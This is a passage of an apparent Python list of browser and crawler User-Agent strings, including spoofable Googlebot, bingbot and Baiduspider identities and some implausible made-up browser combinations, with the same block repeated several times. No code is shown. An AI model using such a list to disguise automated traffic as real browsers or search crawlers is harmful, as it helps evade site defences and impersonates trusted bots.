'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
